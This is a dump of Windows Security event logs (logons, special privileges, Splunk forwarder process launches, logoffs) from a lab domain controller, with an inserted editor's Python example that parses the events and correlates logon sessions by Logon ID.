OpCode=Info
RecordNumber=264179
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C83A4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264178
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C835C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264177
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C835C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264176
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C826E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62373
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264175
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C826E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264174
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C824B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62372
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264173
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C824B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264187
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264186
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x408
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264188
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x760
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264189
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x554
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264190
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x290
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264192
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264191
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15d8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:54:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264193
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C8455
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264196
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7CBD41
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264195
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7CBD41
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62388
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264194
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7CBD41
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
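The per-event text above states that a 4634 "may be positively correlated with a logon event using the Logon ID value" and that Token Elevation Type is one of three types, but two things make that harder than it looks in this dump: events are printed by timestamp with their RecordNumbers out of order (the 4634 for 0x7CBD41, record 264196, appears before its own 4624, record 264195), and one message carries several "Logon ID" and "Security ID" lines under different section headers, which a naive key/value parse would overwrite. The following Python is added here as an editor's example and is not part of the original dump or of any Splunk tooling: it parses this Splunk-style multi-line event format, keys fields by (section, field), decodes Token Elevation Type from the %%1936/%%1937/%%1938 message-table ids to Type 1/2/3 (that mapping is assumed from the Windows message table, the page only shows %%1936), and joins 4624/4672/4634 on Logon ID in RecordNumber order. SAMPLE is a constructed, trimmed copy of five events from this page, with the same field names and section headers as printed above.

```python
import re
from collections import defaultdict

# Added example, not from the original dump: parse the Splunk-style multi-line Windows
# Security events shown on this page and join 4624 / 4672 / 4634 on Logon ID.
TS_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")   # event boundary
HEADER_RE = re.compile(r"^([A-Za-z]+)=(.*)$")                        # EventCode=4688
SECTION_RE = re.compile(r"^([A-Z][A-Za-z ]+):$")                     # "New Logon:"
FIELD_RE = re.compile(r"^([A-Z][A-Za-z0-9 ()]{0,40}): (.*)$")        # "Logon ID: 0x3E7"
PRIV_RE = re.compile(r"^Se[A-Za-z]+Privilege$")                      # bare 4672 list line
TOKEN_ELEVATION = {"%%1936": 1, "%%1937": 2, "%%1938": 3}   # assumed message-table id -> Type

def parse_events(text):
    """One dict per event: header keys, message fields keyed by (section, field) so the
    repeated "Logon ID" / "Security ID" lines of one event do not collide, and the bare
    privilege lines of a 4672. The explanatory text after each message is dropped."""
    events, cur, section = [], None, ""
    for line in map(str.strip, text.splitlines()):
        if TS_RE.match(line):
            cur, section = {"time": line, "fields": {}, "privileges": []}, ""
            events.append(cur)
        elif cur is None or not line:
            continue
        elif m := HEADER_RE.match(line):
            cur[m[1]] = m[2]
        elif m := SECTION_RE.match(line):
            section = m[1]
        elif m := FIELD_RE.match(line):
            cur["fields"][(section, m[1])] = m[2]
        elif PRIV_RE.match(line):
            cur["privileges"].append(line)
    return events

def process_creations(events):
    """4688 rows: creator -> new process, with Token Elevation Type decoded to 1/2/3."""
    pi = lambda e, k: e["fields"].get(("Process Information", k))
    return [{"parent": pi(e, "Creator Process Name"), "child": pi(e, "New Process Name"),
             "cmdline": pi(e, "Process Command Line"),
             "token_type": TOKEN_ELEVATION.get(pi(e, "Token Elevation Type"))}
            for e in events if e.get("EventCode") == "4688"]

def correlate_sessions(events):
    """Join 4624 / 4672 / 4634 on Logon ID. Events are walked by RecordNumber, not by the
    printed time: the dump shows the 4634 for 0x7CBD41 (264196) before its 4624 (264195)."""
    sessions = defaultdict(dict)
    for e in sorted(events, key=lambda e: int(e["RecordNumber"])):
        f, code, rec = e["fields"], e.get("EventCode"), int(e["RecordNumber"])
        if code == "4624":
            sessions[f[("New Logon", "Logon ID")]].update(
                logon_record=rec, account=f[("New Logon", "Account Name")],
                source=f[("Network Information", "Source Network Address")])
        elif code == "4672":   # first privilege is on the "Privileges:" line, the rest are bare
            sessions[f[("Subject", "Logon ID")]]["privileges"] = [f[("Subject", "Privileges")]] + e["privileges"]
        elif code == "4634":
            sessions[f[("Subject", "Logon ID")]]["logoff_record"] = rec
    return dict(sessions)

def unmatched_logoffs(sessions):
    """Logon IDs with a 4634 but no 4624 in the window: a correlation gap (the session began
    before the window), not an anomaly by itself. Logon IDs are reused after a reboot."""
    return sorted(l for l, s in sessions.items() if "logoff_record" in s and "logon_record" not in s)

# Constructed sample: five events copied from the dump above and trimmed to the lines the
# parser needs, keeping the out-of-order 4634/4624 pair and one line of explanatory text.
SAMPLE = r"""
04/19/2021 02:54:13 PM
EventCode=4688
RecordNumber=264190
Process Information:
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
04/19/2021 02:54:17 PM
EventCode=4634
RecordNumber=264193
Subject:
Logon ID: 0x7C8455
04/19/2021 02:54:55 PM
EventCode=4634
RecordNumber=264196
Subject:
Logon ID: 0x7CBD41
04/19/2021 02:54:55 PM
EventCode=4624
RecordNumber=264195
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x7CBD41
Network Information:
Source Network Address: ::1
04/19/2021 02:54:55 PM
EventCode=4672
RecordNumber=264194
Subject:
Logon ID: 0x7CBD41
Privileges: SeSecurityPrivilege
SeDebugPrivilege
"""
```

On the sample, `correlate_sessions` reconstructs the 0x7CBD41 session (Kerberos network logon of the machine account from ::1, SeSecurityPrivilege and SeDebugPrivilege assigned, logged off at record 264196) even though the 4634 is printed first, and `unmatched_logoffs` returns `["0x7C8455"]` because that session's 4624 lies outside the excerpt. On a live feed, bound the join by host and by boot, since the page's own note says Logon IDs are only unique between reboots on the same computer.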
04/19/2021 02:55:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264198
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1990
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264197
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
